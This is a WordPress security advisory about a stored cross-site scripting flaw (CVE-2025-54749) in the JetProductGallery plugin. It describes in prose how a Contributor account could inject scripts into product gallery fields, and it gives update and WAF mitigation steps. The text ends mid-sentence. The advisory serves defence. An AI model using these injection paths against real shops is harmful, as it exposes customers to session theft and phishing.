| Plugin Name | JetProductGallery |
|---|---|
| Type of Vulnerability | Cross-Site Scripting (XSS) |
| CVE Number | CVE-2025-54749 |
| Urgency | Low |
| CVE Publish Date | 2025-08-14 |
| Source URL | CVE-2025-54749 |
Urgent: JetProductGallery (<= 2.2.0.2) XSS (CVE-2025-54749) — What WordPress Site Owners Must Do Now
TL;DR — Quick summary
A publicly disclosed Cross‑Site Scripting (XSS) vulnerability (CVE-2025-54749) affects the JetProductGallery plugin for WooCommerce when the installed plugin version is 2.2.0.2 or lower. The vendor released an update in version 2.2.0.3 that fixes the issue. The vulnerability allows a user with Contributor privileges to inject malicious HTML/JavaScript that could execute in other users’ browsers when product pages or gallery components are viewed.
If you operate a WordPress site that uses JetProductGallery:
- Update the plugin to 2.2.0.3 or later immediately (the vendor patch is the primary fix).
- If you cannot update right away, apply mitigations: tighten contributor privileges, scan for injected scripts, deploy virtual patches via your WAF or server filters, and enable runtime protections like Content Security Policy (CSP) to reduce impact.
- Review the site for signs of compromise, check logs, and restore from a clean backup if you find evidence of malicious code.
This advisory explains the risk, realistic attack scenarios, immediate steps to take, detection methods, and longer‑term hardening measures — from the perspective of a Hong Kong security practitioner familiar with e‑commerce and multi‑vendor environments.
Background: What we know about the issue
- Vulnerability type: Cross‑Site Scripting (XSS)
- Affected software: JetProductGallery (Jet Woo Product Gallery plugin)
- Affected versions: <= 2.2.0.2
- Fixed in: 2.2.0.3
- CVE: CVE-2025-54749
- Reported by: security researcher (public disclosure)
- Required attacker privileges: Contributor (able to add products or modify product-related content)
- CVSS (reported): 6.5 — mid-level severity reflecting persistent content injection risk
Persistent XSS on an e‑commerce site is high‑impact for customer trust and safety. The distinguishing factor here is that a Contributor‑level account can inject payloads that persist on product pages — a realistic risk in marketplaces, agency stores, and multi‑author catalogs common across Hong Kong and the region.
Why this matters — realistic attack paths
An attacker who can create or edit product content (Contributor role or similar) could:
- Inject script tags into gallery captions, image metadata, custom fields, or other product fields the plugin renders without proper escaping.
- Use injected scripts to redirect users to phishing pages, display rogue overlay content, or attempt to steal session tokens (subject to browser protections).
- Load additional malicious resources (trackers, stealer scripts) or trigger unwanted browser actions against users.
- Persist payloads so they trigger whenever product pages or galleries are viewed, rapidly exposing visitors at scale.
Immediate actions (first 1–24 hours)
-
Update JetProductGallery to 2.2.0.3 or later
This is the primary and definitive fix. Update from WordPress admin (Plugins → Installed Plugins → Update) or via WP‑CLI:
wp plugin update jet-woo-product-galleryVerify the plugin slug in your installation; replace the slug in the command if different.
-
If you cannot update immediately, deploy compensating controls
Apply server or WAF rules to block or sanitize script tags and suspicious payloads in product-related requests and fields the plugin renders (gallery captions, image titles, product meta). Block POST/PUT requests containing
